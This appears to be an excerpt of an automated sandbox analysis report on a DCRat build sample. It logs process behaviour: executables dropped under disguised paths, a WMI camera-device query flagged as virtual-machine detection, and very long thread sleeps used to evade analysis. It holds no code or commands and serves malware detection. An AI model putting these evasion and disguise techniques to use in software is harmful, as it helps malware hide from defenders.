            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\7-Zip\Lang\System.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeMemory allocated: CE0000 memory reserve | memory write watchJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeMemory allocated: 1A850000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeMemory allocated: 8B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeMemory allocated: 1A510000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeMemory allocated: 1030000 memory reserve | memory write watch
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeMemory allocated: 1AD80000 memory reserve | memory write watch
            Source: C:\Program Files\7-Zip\Lang\System.exeMemory allocated: 2A40000 memory reserve | memory write watch
            Source: C:\Program Files\7-Zip\Lang\System.exeMemory allocated: 1AC60000 memory reserve | memory write watch
            Source: C:\Program Files\7-Zip\Lang\System.exeMemory allocated: 12B0000 memory reserve | memory write watch
            Source: C:\Program Files\7-Zip\Lang\System.exeMemory allocated: 1AD70000 memory reserve | memory write watch
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 3600000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 3599890Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599611Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599482Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599374Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599265Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599138Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 598131Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597233Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597124Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596905Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596532Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596293Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596182Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595915Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595811Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595694Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595229Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594905Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594576Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594249Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594113Jump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\7-Zip\Lang\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\7-Zip\Lang\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWindow / User API: threadDelayed 423Jump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeWindow / User API: threadDelayed 1563Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeWindow / User API: threadDelayed 3264Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeWindow / User API: threadDelayed 6476Jump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeWindow / User API: threadDelayed 363
            Source: C:\Program Files\7-Zip\Lang\System.exeWindow / User API: threadDelayed 366
            Source: C:\Program Files\7-Zip\Lang\System.exeWindow / User API: threadDelayed 365
            Source: C:\Users\user\Desktop\DCRatBuild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23008
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe TID: 3152Thread sleep count: 423 > 30Jump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe TID: 3152Thread sleep count: 1563 > 30Jump to behavior
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe TID: 6528Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -23058430092136925s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -3600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -3599890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -599611s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -599482s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -599374s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -599265s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -599138s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -598131s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597233s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597124s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596905s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596796s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596532s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596293s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596182s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595915s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595811s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595694s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595229s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595124s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594905s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594796s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594576s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594468s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594359s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594249s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594113s >= -30000sJump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe TID: 7728Thread sleep count: 363 > 30
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe TID: 7584Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\7-Zip\Lang\System.exe TID: 7756Thread sleep count: 366 > 30
            Source: C:\Program Files\7-Zip\Lang\System.exe TID: 7652Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\7-Zip\Lang\System.exe TID: 7664Thread sleep count: 365 > 30
            Source: C:\Program Files\7-Zip\Lang\System.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\7-Zip\Lang\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\7-Zip\Lang\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D6A5F4
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D7B8E0
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8AAA8 FindFirstFileExA,0_2_00D8AAA8
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7DD72 VirtualQuery,GetSystemInfo,0_2_00D7DD72
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 3600000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 3599890Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599611Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599482Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599374Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599265Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599138Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 598131Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597233Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597124Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596905Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596532Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596293Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596182Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595915Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595811Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595694Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595578Jump to behavior
